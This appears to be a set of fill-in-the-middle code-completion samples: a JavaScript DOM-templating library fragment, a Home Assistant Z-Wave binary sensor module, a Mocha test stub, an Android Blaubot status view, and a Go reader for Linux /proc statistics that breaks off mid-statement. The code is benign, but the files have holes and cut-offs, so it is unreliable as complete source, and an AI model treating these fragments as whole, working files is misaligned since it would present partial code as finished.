_len3 - 2 : 0), _key3 = 2; _key3 < _len3; _key3++) { args[_key3 - 2] = arguments[_key3]; } return (_get = this.get(elem))[methodName].apply(_get, [elem].concat(args)); } }]); return JamilihMap; }(Map); var JamilihWeakMap = function (_WeakMap) { inherits(JamilihWeakMap, _WeakMap); function JamilihWeakMap() { classCallCheck(this, JamilihWeakMap); return possibleConstructorReturn(this, (JamilihWeakMap.__proto__ || Object.getPrototypeOf(JamilihWeakMap)).apply(this, arguments)); } createClass(JamilihWeakMap, [{ key: 'get', value: function get$$1(elem) { elem = typeof elem === 'string' ? $(elem) : elem; return get(JamilihWeakMap.prototype.__proto__ || Object.getPrototypeOf(JamilihWeakMap.prototype), 'get', this).call(this, elem); } }, { key: 'set', value: function set$$1(elem, value) { elem = typeof elem === 'string' ? $(elem) : elem; return get(JamilihWeakMap.prototype.__proto__ || Object.getPrototypeOf(JamilihWeakMap.prototype), 'set', this).call(this, elem, value); } }, { key: 'invoke', value: function invoke(elem, methodName) { var _get2; elem = typeof elem === 'string' ? $(elem) : elem; for (var _len4 = arguments.length, args = Array(_len4 > 2 ? _len4 - 2 : 0), _key4 = 2; _key4 < _len4; _key4++) { args[_key4 - 2] = arguments[_key4]; } return (_get2 = this.get(elem))[methodName].apply(_get2, [elem].concat(args)); } }]); return JamilihWeakMap; }(WeakMap); jml.Map = JamilihMap; jml.WeakMap = JamilihWeakMap; jml.weak = function (obj) { var map = new JamilihWeakMap(); for (var _len5 = arguments.length, args = Array(_len5 > 1 ? _len5 - 1 : 0), _key5 = 1; _key5 < _len5; _key5++) { args[_key5 - 1] = arguments[_key5]; } var elem = jml.apply(undefined, [{ $map: [map, obj] }].concat(args)); return [map, elem]; }; jml.strong = function (obj) { var map = new JamilihMap(); for (var _len6 = arguments.length, args = Array(_len6 > 1 ? _len6 - 1 : 0), _key6 = 1; _key6 < _len6; _key6++) { args[_key6 - 1] = arguments[_key6]; } var elem = jml.apply(undefined, [{ $map: [map, obj] }].concat(args)); return [map, elem]; }; jml.symbol = jml.sym = jml.for = function (elem, sym) { elem = typeof elem === 'string' ? $(elem) : elem; return elem[(typeof sym === 'undefined' ? 'undefined' : _typeof(sym)) === 'symbol' ? sym : Symbol.for(sym)]; }; jml.command = function (elem, symOrMap, methodName) { elem = typeof elem === 'string' ? $(elem) : elem; var func = void 0; for (var _len7 = arguments.length, args = Array(_len7 > 3 ? _len7 - 3 : 0), _key7 = 3; _key7 < _len7; _key7++) { args[_key7 - 3] = arguments[_key7]; } if (['symbol', 'string'].includes(typeof symOrMap === 'undefined' ? 
'undefined' : _typeof(symOrMap))) { var _func; func = jml.sym(elem, symOrMap); if (typeof func === 'function') { return func.apply(undefined, [methodName].concat(args)); // Already has `this` bound to `elem` } return (_func = func)[methodName].apply(_func, args); } else { var _func3; func = symOrMap.get(elem); if (typeof func === 'function') { var _func2; return (_func2 = func).call.apply(_func2, [elem, methodName].concat(args)); } return (_func3 = func)[methodName].apply(_func3, [elem].concat(args)); } // return func[methodName].call(elem, ...args); }; jml.setWindow = function (wind) { win = wind; }; jml.setDocument = function (docum) { doc = docum; if (docum && docum.body) { body = docum.body; } }; jml.setXMLSerializer = function (xmls) { XmlSerializer = xmls; }; jml.getWindow = function () { return win; }; jml.getDocument = function () { return doc; }; jml.getXMLSerializer = function () { return XmlSerializer; }; var body = doc && doc.body; var nbsp = '\xA0'; // Very commonly needed in templates export default jml; export { jml, $, $$, nbsp, body };<|fim▁end|>
jml.toDOM = function () {
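// Editor's note: an illustrative usage sketch of the jml() API documented above, not part of the original source.
// The element names, attributes, and the document.body parent below are hypothetical examples; the argument order
// follows the JSDoc: element name, optional attributes object, optional children array, optional parent element.
var greeting = jml('div', { 'class': 'greeting' }, ['Hello, world!'], document.body); // builds <div class="greeting">Hello, world!</div> and appends it to <body>
var list = jml('ul', [['li', ['one']], ['li', ['two']]]); // nested arrays become child elements; with no parent given, the detached <ul> is returned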
<|file_name|>binary_sensor.py<|end_file_name|><|fim▁begin|>"""Representation of Z-Wave binary_sensors.""" from openzwavemqtt.const import CommandClass, ValueIndex, ValueType from homeassistant.components.binary_sensor import ( DOMAIN as BINARY_SENSOR_DOMAIN, BinarySensorDeviceClass, BinarySensorEntity, ) from homeassistant.config_entries import ConfigEntry from homeassistant.core import HomeAssistant, callback from homeassistant.helpers.dispatcher import async_dispatcher_connect from homeassistant.helpers.entity_platform import AddEntitiesCallback from .const import DATA_UNSUBSCRIBE, DOMAIN from .entity import ZWaveDeviceEntity NOTIFICATION_TYPE = "index" NOTIFICATION_VALUES = "values" NOTIFICATION_DEVICE_CLASS = "device_class" NOTIFICATION_SENSOR_ENABLED = "enabled" NOTIFICATION_OFF_VALUE = "off_value" NOTIFICATION_VALUE_CLEAR = 0 # Translation from values in Notification CC to binary sensors # https://github.com/OpenZWave/open-zwave/blob/master/config/NotificationCCTypes.xml NOTIFICATION_SENSORS = [ { # Index 1: Smoke Alarm - Value Id's 1 and 2 # Assuming here that Value 1 and 2 are not present at the same time NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_SMOKE_ALARM, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SMOKE, }, { # Index 1: Smoke Alarm - All other Value Id's # Create as disabled sensors NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_SMOKE_ALARM, NOTIFICATION_VALUES: [3, 4, 5, 6, 7, 8], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SMOKE, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 2: Carbon Monoxide - Value Id's 1 and 2 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_CARBON_MONOOXIDE, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.GAS, }, { # Index 2: Carbon Monoxide - All other Value Id's NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_CARBON_MONOOXIDE, NOTIFICATION_VALUES: [4, 5, 7], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.GAS, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 3: Carbon Dioxide - Value Id's 1 and 2 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_CARBON_DIOXIDE, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.GAS, }, { # Index 3: Carbon Dioxide - All other Value Id's NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_CARBON_DIOXIDE, NOTIFICATION_VALUES: [4, 5, 7], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.GAS, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 4: Heat - Value Id's 1, 2, 5, 6 (heat/underheat) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HEAT, NOTIFICATION_VALUES: [1, 2, 5, 6], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.HEAT, }, { # Index 4: Heat - All other Value Id's NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HEAT, NOTIFICATION_VALUES: [3, 4, 8, 10, 11], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.HEAT, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 5: Water - Value Id's 1, 2, 3, 4 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_WATER, NOTIFICATION_VALUES: [1, 2, 3, 4], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.MOISTURE, }, { # Index 5: Water - All other Value Id's NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_WATER, NOTIFICATION_VALUES: [5], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.MOISTURE, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 6: Access Control - Value Id's 1, 2, 3, 4 (Lock) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_ACCESS_CONTROL, NOTIFICATION_VALUES: [1, 2, 3, 4], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.LOCK, }, { # Index 6: Access Control - Value Id 22 (door/window open) NOTIFICATION_TYPE: 
ValueIndex.NOTIFICATION_ACCESS_CONTROL, NOTIFICATION_VALUES: [22], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.DOOR, NOTIFICATION_OFF_VALUE: 23, }, { # Index 7: Home Security - Value Id's 1, 2 (intrusion) # Assuming that value 1 and 2 are not present at the same time NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HOME_SECURITY, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SAFETY, }, { # Index 7: Home Security - Value Id's 3, 4, 9 (tampering) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HOME_SECURITY, NOTIFICATION_VALUES: [3, 4, 9], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SAFETY, }, { # Index 7: Home Security - Value Id's 5, 6 (glass breakage) # Assuming that value 5 and 6 are not present at the same time NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HOME_SECURITY, NOTIFICATION_VALUES: [5, 6], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SAFETY, }, { # Index 7: Home Security - Value Id's 7, 8 (motion) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HOME_SECURITY, NOTIFICATION_VALUES: [7, 8], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.MOTION, }, { # Index 8: Power management - Values 1...9 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_POWER_MANAGEMENT, NOTIFICATION_VALUES: [1, 2, 3, 4, 5, 6, 7, 8, 9], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.POWER, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 8: Power management - Values 10...15 # Battery values (mutually exclusive) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_POWER_MANAGEMENT, NOTIFICATION_VALUES: [10, 11, 12, 13, 14, 15], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.POWER, NOTIFICATION_SENSOR_ENABLED: False, NOTIFICATION_OFF_VALUE: None, }, { # Index 9: System - Value Id's 1, 2, 6, 7 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_SYSTEM, NOTIFICATION_VALUES: [1, 2, 6, 7], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.PROBLEM, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 10: Emergency - Value Id's 1, 2, 3 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_EMERGENCY, NOTIFICATION_VALUES: [1, 2, 3], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.PROBLEM, }, { # Index 11: Clock - Value Id's 1, 2 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_CLOCK, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: None, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 12: Appliance - All Value Id's NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_APPLIANCE, NOTIFICATION_VALUES: [ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, ], NOTIFICATION_DEVICE_CLASS: None, }, { # Index 13: Home Health - Value Id's 1,2,3,4,5 (assumes ValueIndex.NOTIFICATION_HOME_HEALTH exists for CC index 13) NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_HOME_HEALTH, NOTIFICATION_VALUES: [1, 2, 3, 4, 5], NOTIFICATION_DEVICE_CLASS: None, }, { # Index 14: Siren NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_SIREN, NOTIFICATION_VALUES: [1], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SOUND, }, { # Index 15: Water valve # ignore non-boolean values NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_WATER_VALVE, NOTIFICATION_VALUES: [3, 4], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.PROBLEM, }, { # Index 16: Weather NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_WEATHER, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.PROBLEM, }, { # Index 17: Irrigation # ignore non-boolean values NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_IRRIGATION, NOTIFICATION_VALUES: [1, 2, 3, 4, 5], NOTIFICATION_DEVICE_CLASS: None, }, { # Index 18: Gas NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_GAS, NOTIFICATION_VALUES: [1, 2, 3, 4], NOTIFICATION_DEVICE_CLASS:
BinarySensorDeviceClass.GAS, }, { # Index 18: Gas NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_GAS, NOTIFICATION_VALUES: [6], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.PROBLEM, }, ] async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback, ) -> None: """Set up Z-Wave binary_sensor from config entry.""" @callback def async_add_binary_sensor(values): """Add Z-Wave Binary Sensor(s).""" async_add_entities(VALUE_TYPE_SENSORS[values.primary.type](values)) hass.data[DOMAIN][config_entry.entry_id][DATA_UNSUBSCRIBE].append( async_dispatcher_connect( hass, f"{DOMAIN}_new_{BINARY_SENSOR_DOMAIN}", async_add_binary_sensor ) ) @callback def async_get_legacy_binary_sensors(values): """Add Legacy/classic Z-Wave Binary Sensor.""" return [ZWaveBinarySensor(values)] @callback def async_get_notification_sensors(values): """Convert Notification values into binary sensors.""" sensors_to_add = [] for list_value in values.primary.value["List"]: # check if we have a mapping for this value for item in NOTIFICATION_SENSORS: if item[NOTIFICATION_TYPE] != values.primary.index: continue if list_value["Value"] not in item[NOTIFICATION_VALUES]: continue sensors_to_add.append( ZWaveListValueSensor( # required values values, list_value["Value"], item[NOTIFICATION_DEVICE_CLASS], # optional values item.get(NOTIFICATION_SENSOR_ENABLED, True), item.get(NOTIFICATION_OFF_VALUE, NOTIFICATION_VALUE_CLEAR), ) ) return sensors_to_add VALUE_TYPE_SENSORS = { ValueType.BOOL: async_get_legacy_binary_sensors, ValueType.LIST: async_get_notification_sensors, } class ZWaveBinarySensor(ZWaveDeviceEntity, BinarySensorEntity): """Representation of a Z-Wave binary_sensor.""" @property def is_on(self): """Return if the sensor is on or off.""" return self.values.primary.value @property def entity_registry_enabled_default(self) -> bool: """Return if the entity should be enabled when first added to the entity registry.""" # Legacy binary sensors are phased out (replaced by notification sensors) # Disable by default to not confuse users for item in self.values.primary.node.values(): if item.command_class == CommandClass.NOTIFICATION: # This device properly implements the Notification CC, legacy sensor can be disabled return False return True class ZWaveListValueSensor(ZWaveDeviceEntity, BinarySensorEntity): """Representation of a binary_sensor from values in the Z-Wave Notification CommandClass.""" def __init__( self, values, on_value, device_class=None, default_enabled=True, off_value=NOTIFICATION_VALUE_CLEAR, ): """Initialize a ZWaveListValueSensor entity.""" super().__init__(values) self._on_value = on_value self._device_class = device_class self._default_enabled = default_enabled self._off_value = off_value # make sure the correct value is selected at startup self._state = False self.on_value_update()<|fim▁hole|> @callback def on_value_update(self): """Call when a value is added/updated in the underlying EntityValues Collection.""" if self.values.primary.value["Selected_id"] == self._on_value: # Only when the active ID exactly matches our watched ON value, set sensor state to ON self._state = True elif self.values.primary.value["Selected_id"] == self._off_value: # Only when the active ID exactly matches our watched OFF value, set sensor state to OFF self._state = False elif ( self._off_value is None and self.values.primary.value["Selected_id"] != self._on_value ): # Off value not explicitly specified # Some values are reset by the simple fact they're overruled by another value 
coming in # For example the battery charging values in Power Management Index self._state = False @property def name(self): """Return the name of the entity.""" # Append value label to base name base_name = super().name value_label = "" for item in self.values.primary.value["List"]: if item["Value"] == self._on_value: value_label = item["Label"] break # Strip "on location" / "at location" from name # Note: We're assuming that we don't retrieve 2 values with different location value_label = value_label.split(" on ")[0] value_label = value_label.split(" at ")[0] return f"{base_name}: {value_label}" @property def unique_id(self): """Return the unique_id of the entity.""" unique_id = super().unique_id return f"{unique_id}.{self._on_value}" @property def is_on(self): """Return if the sensor is on or off.""" return self._state @property def device_class(self): """Return the class of this device, from component DEVICE_CLASSES.""" return self._device_class @property def entity_registry_enabled_default(self) -> bool: """Return if the entity should be enabled when first added to the entity registry.""" # We hide the more advanced sensors by default to not overwhelm users return self._default_enabled<|fim▁end|>
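# Editor's note: a minimal sketch, not part of the original integration, showing the
# lookup that async_get_notification_sensors() performs against NOTIFICATION_SENSORS.
# The helper name and the sample index/value below are hypothetical.
def _find_notification_mapping(index, list_value):
    """Return the first NOTIFICATION_SENSORS entry matching a notification index/value pair."""
    for item in NOTIFICATION_SENSORS:
        if item[NOTIFICATION_TYPE] == index and list_value in item[NOTIFICATION_VALUES]:
            return item
    return None

# For example, _find_notification_mapping(ValueIndex.NOTIFICATION_HOME_SECURITY, 7)
# would return the motion mapping (BinarySensorDeviceClass.MOTION).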
<|file_name|>depRepSpec.js<|end_file_name|><|fim▁begin|>#!/usr/bin/env node 'use strict'; var assert = require('assert'); var depRep = require('../../lib/depRep'); var oldJson = require('../fixtures/old.json'); var newJson = require('../fixtures/new.json'); var unsupported = require('../fixtures/unsupported.json'); function key(number, dev) { var prefix = "/dependencies/"; if (dev) prefix = "/devDependencies/"; return prefix + number; } describe('Compare', function () { // describe('#report()', function () { // it('should generate a proper report for dependencies', function (done) { // depRep // .report(oldJson, newJson) // .then(function (report) {<|fim▁hole|> // assert.equal(report[key(4)].status, null); // assert.equal(report[key(5)].status, null); // assert.equal(report[key(6)], null); // assert.equal(report[key(7)].status, null); // assert.equal(report[key(8)].status, "minor"); // assert.equal(report[key(9)].status, "major"); // done(); // }); // }); // }); // // describe('#report()', function () { // it('should generate a proper report for devDependencies', function (done) { // depRep // .report(oldJson, newJson) // .then(function (report) { // assert.equal(report[key(1, true)].status, "major"); // assert.equal(report[key(2, true)].status, null); // assert.equal(report[key(3, true)], null); // assert.equal(report[key(4, true)].status, null); // assert.equal(report[key(5, true)].status, null); // assert.equal(report[key(6, true)], null); // assert.equal(report[key(7, true)].status, null); // assert.equal(report[key(8, true)].status, "minor"); // assert.equal(report[key(9, true)].status, "major"); // done(); // }); // }); // }); });<|fim▁end|>
// assert.equal(report[key(1)].status, "major"); // assert.equal(report[key(2)].status, null); // assert.equal(report[key(3)], null);
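// Editor's note: an illustrative sketch, not part of the original spec, of the report
// shape implied by the expectations above: keys are "/dependencies/<n>" or
// "/devDependencies/<n>" paths and each entry carries a status of "major", "minor",
// or null. This structure is inferred from the assertions, not confirmed against lib/depRep.
// var exampleReport = {
//   '/dependencies/1': { status: 'major' },
//   '/dependencies/8': { status: 'minor' },
//   '/devDependencies/2': { status: null }
// };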
<|file_name|>KingdomView.java<|end_file_name|><|fim▁begin|>package eu.hgross.blaubot.android.views; import android.content.Context; import android.graphics.drawable.Drawable; import android.os.Handler; import android.os.Looper; import android.util.AttributeSet; import android.view.View; import android.widget.ImageView; import android.widget.LinearLayout; import android.widget.TextView; import java.util.ArrayList; import java.util.List; import java.util.Map.Entry; import java.util.Set; import eu.hgross.blaubot.admin.AbstractAdminMessage; import eu.hgross.blaubot.admin.CensusMessage; import eu.hgross.blaubot.android.R; import eu.hgross.blaubot.core.Blaubot; import eu.hgross.blaubot.core.IBlaubotConnection; import eu.hgross.blaubot.core.State; import eu.hgross.blaubot.core.acceptor.IBlaubotConnectionManagerListener; import eu.hgross.blaubot.core.statemachine.IBlaubotConnectionStateMachineListener; import eu.hgross.blaubot.core.statemachine.states.IBlaubotState; import eu.hgross.blaubot.messaging.IBlaubotAdminMessageListener; import eu.hgross.blaubot.ui.IBlaubotDebugView; /** * Android view to display information about the StateMachine's state. * * Add this view to a blaubot instance like this: stateView.registerBlaubotInstance(blaubot); * * @author Henning Gross {@literal ([email protected])} * */ public class KingdomView extends LinearLayout implements IBlaubotDebugView { private Handler mUiHandler; private Blaubot mBlaubot; private Context mContext; public KingdomView(Context context, AttributeSet attrs) { super(context, attrs); initView(context); } public KingdomView(Context context, AttributeSet attrs, int defStyle) { super(context, attrs, defStyle); initView(context); } private void initView(Context context) { this.mContext = context; mUiHandler = new Handler(Looper.getMainLooper()); } private final static String NO_CENSUS_MESSAGE_SO_FAR_TEXT = "Got no census message so far"; private void updateUI(final CensusMessage censusMessage) { mUiHandler.post(new Runnable() { @Override public void run() { final List<View> stateItems = new ArrayList<>(); if(censusMessage != null) { final Set<Entry<String, State>> entries = censusMessage.getDeviceStates().entrySet(); for(Entry<String, State> entry : entries) { final String uniqueDeviceId = entry.getKey(); final State state = entry.getValue(); View item = createKingdomViewListItem(mContext, state, uniqueDeviceId); stateItems.add(item); } } // Never got a message if(stateItems.isEmpty()) { TextView tv = new TextView(mContext); tv.setText(NO_CENSUS_MESSAGE_SO_FAR_TEXT); stateItems.add(tv); } removeAllViews(); for(View v : stateItems) { addView(v); } }<|fim▁hole|> * Creates a kingdom view list item * * @param context the context * @param state the state of the device to visualize * @param uniqueDeviceId the unique device id * @return the constructed view */ public static View createKingdomViewListItem(Context context, State state, String uniqueDeviceId) { final Drawable icon = ViewUtils.getDrawableForBlaubotState(context, state); View item = inflate(context, R.layout.blaubot_kingdom_view_list_item, null); TextView uniqueDeviceIdTextView = (TextView) item.findViewById(R.id.uniqueDeviceIdLabel); TextView stateTextView = (TextView) item.findViewById(R.id.stateLabel); ImageView iconImageView = (ImageView) item.findViewById(R.id.stateIcon); iconImageView.setImageDrawable(icon); uniqueDeviceIdTextView.setText(uniqueDeviceId); stateTextView.setText(state.toString()); return item; } private IBlaubotConnectionManagerListener mConnectionManagerListener = new
IBlaubotConnectionManagerListener() { @Override public void onConnectionClosed(IBlaubotConnection connection) { } @Override public void onConnectionEstablished(IBlaubotConnection connection) { } }; private IBlaubotConnectionStateMachineListener mBlaubotConnectionStateMachineListener = new IBlaubotConnectionStateMachineListener() { @Override public void onStateChanged(IBlaubotState oldState, final IBlaubotState state) { if(State.getStateByStatemachineClass(state.getClass()) == State.Free) { updateUI(null); } } @Override public void onStateMachineStopped() { updateUI(null); } @Override public void onStateMachineStarted() { } }; private IBlaubotAdminMessageListener connectionLayerAdminMessageListener = new IBlaubotAdminMessageListener() { @Override public void onAdminMessage(AbstractAdminMessage adminMessage) { if(adminMessage instanceof CensusMessage) { updateUI((CensusMessage) adminMessage); } } }; /** * Register this view with the given blaubot instance * * @param blaubot * the blaubot instance to connect with */ @Override public void registerBlaubotInstance(Blaubot blaubot) { if (mBlaubot != null) { unregisterBlaubotInstance(); } this.mBlaubot = blaubot; this.mBlaubot.getConnectionStateMachine().addConnectionStateMachineListener(mBlaubotConnectionStateMachineListener); this.mBlaubot.getChannelManager().addAdminMessageListener(connectionLayerAdminMessageListener); this.mBlaubot.getConnectionManager().addConnectionListener(mConnectionManagerListener); // update updateUI(null); } @Override public void unregisterBlaubotInstance() { if(mBlaubot != null) { this.mBlaubot.getConnectionStateMachine().removeConnectionStateMachineListener(mBlaubotConnectionStateMachineListener); this.mBlaubot.getChannelManager().removeAdminMessageListener(connectionLayerAdminMessageListener); this.mBlaubot.getConnectionManager().removeConnectionListener(mConnectionManagerListener); } // force some updates updateUI(null); } }<|fim▁end|>
}); } /**
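// Editor's note: an illustrative wiring sketch for KingdomView, not part of the original
// source. The field names (mKingdomView, mBlaubot) and the R.id.kingdomView layout entry
// are hypothetical; only registerBlaubotInstance/unregisterBlaubotInstance come from the class above.
//     mKingdomView = (KingdomView) findViewById(R.id.kingdomView); // e.g. in onCreate()
//     mKingdomView.registerBlaubotInstance(mBlaubot);              // start receiving census updates
//     ...
//     mKingdomView.unregisterBlaubotInstance();                    // e.g. in onDestroy(), to avoid leaking listeners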
<|file_name|>perfmonger_linux.go<|end_file_name|><|fim▁begin|>// +build linux package subsystem import ( "bufio" "errors" "fmt" "io" "os" "os/exec" "runtime" "strconv" "strings" ) type PlatformHeader LinuxHeader func NewPlatformHeader() *LinuxHeader { header := new(LinuxHeader) header.Devices = make(map[string]LinuxDevice) header.getDevsParts() return header } func (header *LinuxHeader) getDevsParts() { f, err := os.Open("/proc/diskstats") if err != nil { panic(err) } defer f.Close() scan := bufio.NewScanner(f) for scan.Scan() { var major, minor int var name string c, err := fmt.Sscanf(scan.Text(), "%d %d %s", &major, &minor, &name)<|fim▁hole|> panic(err) } if c != 3 { continue } header.DevsParts = append(header.DevsParts, name) if isDevice(name) { header.Devices[name] = LinuxDevice{ name, getPartitions(name), } } } } func isDevice(name string) bool { stat, err := os.Stat(fmt.Sprintf("/sys/block/%s", name)) if err == nil && stat.IsDir() { return true } return false } func getPartitions(name string) []string { var dir *os.File var fis []os.FileInfo var err error var parts = []string{} dir, err = os.Open(fmt.Sprintf("/sys/block/%s", name)) if err != nil { panic(err) } fis, err = dir.Readdir(0) if err != nil { panic(err) } for _, fi := range fis { _, err := os.Stat(fmt.Sprintf("/sys/block/%s/%s/stat", name, fi.Name())) if err == nil { // partition exists parts = append(parts, fi.Name()) } } return parts } func ReadCpuStat(record *StatRecord) error { f, ferr := os.Open("/proc/stat") if ferr != nil { return ferr } defer f.Close() if record.Cpu == nil { num_core := 0 out, err := exec.Command("nproc", "--all").Output() out_str := strings.TrimSpace(string(out)) if err == nil { num_core, err = strconv.Atoi(out_str) if err != nil { num_core = 0 } } if num_core == 0 { num_core = runtime.NumCPU() } record.Cpu = NewCpuStat(num_core) } else { record.Cpu.Clear() } if record.Proc == nil { record.Proc = NewProcStat() } else { record.Proc.Clear() } scan := bufio.NewScanner(f) for scan.Scan() { var err error var cpu string line := scan.Text() if line[0:4] == "cpu " { // Linux 2.6.33 or later _, err = fmt.Sscanf(line, "%s %d %d %d %d %d %d %d %d %d %d", &cpu, &record.Cpu.All.User, &record.Cpu.All.Nice, &record.Cpu.All.Sys, &record.Cpu.All.Idle, &record.Cpu.All.Iowait, &record.Cpu.All.Hardirq, &record.Cpu.All.Softirq, &record.Cpu.All.Steal, &record.Cpu.All.Guest, &record.Cpu.All.GuestNice) if err == io.EOF { // Linux 2.6.24 or later _, err = fmt.Sscanf(line, "%s %d %d %d %d %d %d %d %d %d", &cpu, &record.Cpu.All.User, &record.Cpu.All.Nice, &record.Cpu.All.Sys, &record.Cpu.All.Idle, &record.Cpu.All.Iowait, &record.Cpu.All.Hardirq, &record.Cpu.All.Softirq, &record.Cpu.All.Steal, &record.Cpu.All.Guest) record.Cpu.All.GuestNice = 0 } if err != nil { panic(err) } } else if line[0:3] == "cpu" { var n_core int var core_stat *CpuCoreStat // assume n_core < 10000 _, err = fmt.Sscanf(line[3:7], "%d", &n_core) if err != nil { panic(err) } core_stat = &record.Cpu.CoreStats[n_core] // Linux 2.6.33 or later _, err = fmt.Sscanf(line, "%s %d %d %d %d %d %d %d %d %d %d", &cpu, &core_stat.User, &core_stat.Nice, &core_stat.Sys, &core_stat.Idle, &core_stat.Iowait, &core_stat.Hardirq, &core_stat.Softirq, &core_stat.Steal, &core_stat.Guest, &core_stat.GuestNice) if err == io.EOF { // Linux 2.6.24 or later _, err = fmt.Sscanf(line, "%s %d %d %d %d %d %d %d %d %d", &cpu, &core_stat.User, &core_stat.Nice, &core_stat.Sys, &core_stat.Idle, &core_stat.Iowait, &core_stat.Hardirq, &core_stat.Softirq, &core_stat.Steal, &core_stat.Guest) } 
if err != nil { panic(err) } } else if line[0:5] == "ctxt " { _, err = fmt.Sscanf(line[4:], "%d", &record.Proc.ContextSwitch) if err != nil { panic(err) } } else if line[0:10] == "processes " { _, err = fmt.Sscanf(line[10:], "%d", &record.Proc.Fork) if err != nil { panic(err) } } } return nil } func parseInterruptStatEntry(line string, num_core int) (*InterruptStatEntry, error) { entry := new(InterruptStatEntry) entry.NumCore = num_core entry.IntrCounts = make([]int, num_core) tokens := strings.Fields(line) idx := 0 tok := tokens[0] tok = strings.TrimRight(tok, ":") if irqno, err := strconv.Atoi(tok); err == nil { entry.IrqNo = irqno entry.IrqType = "" } else { entry.IrqNo = -1 entry.IrqType = tok } for idx := 1; idx < num_core+1; idx += 1 { var c int var err error if idx >= len(tokens) { break } tok = tokens[idx] if c, err = strconv.Atoi(tok); err != nil { return nil, errors.New("Invalid string for IntrCounts element: " + tok) } entry.IntrCounts[idx-1] = c } idx = num_core + 1 if idx < len(tokens) { entry.Descr = strings.Join(tokens[idx:], " ") } else { entry.Descr = "" } return entry, nil } func ReadInterruptStat(record *StatRecord) error { intr_stat := NewInterruptStat() if record == nil { return errors.New("Valid *StatRecord is required.") } f, err := os.Open("/proc/interrupts") if err != nil { panic(err) } defer f.Close() scan := bufio.NewScanner(f) if !scan.Scan() { return errors.New("/proc/interrupts seems to be empty") } cores := strings.Fields(scan.Text()) num_core := len(cores) for scan.Scan() { entry, err := parseInterruptStatEntry(scan.Text(), num_core) if err != nil { return err } intr_stat.Entries = append(intr_stat.Entries, entry) intr_stat.NumEntries += 1 } record.Interrupt = intr_stat return nil } func ReadDiskStats(record *StatRecord, targets *map[string]bool) error { if record == nil { return errors.New("Valid *StatRecord is required.") } f, ferr := os.Open("/proc/diskstats") if ferr != nil { panic(ferr) } defer f.Close() if record.Disk == nil { record.Disk = NewDiskStat() } else { record.Disk.Clear() } scan := bufio.NewScanner(f) var num_items int var err error for scan.Scan() { var rdmerge_or_rdsec int64 var rdsec_or_wrios int64 var rdticks_or_wrsec int64 line := scan.Text() entry := NewDiskStatEntry() num_items, err = fmt.Sscanf(line, "%d %d %s %d %d %d %d %d %d %d %d %d %d %d", &entry.Major, &entry.Minor, &entry.Name, &entry.RdIos, &rdmerge_or_rdsec, &rdsec_or_wrios, &rdticks_or_wrsec, &entry.WrIos, &entry.WrMerges, &entry.WrSectors, &entry.WrTicks, &entry.IosPgr, &entry.TotalTicks, 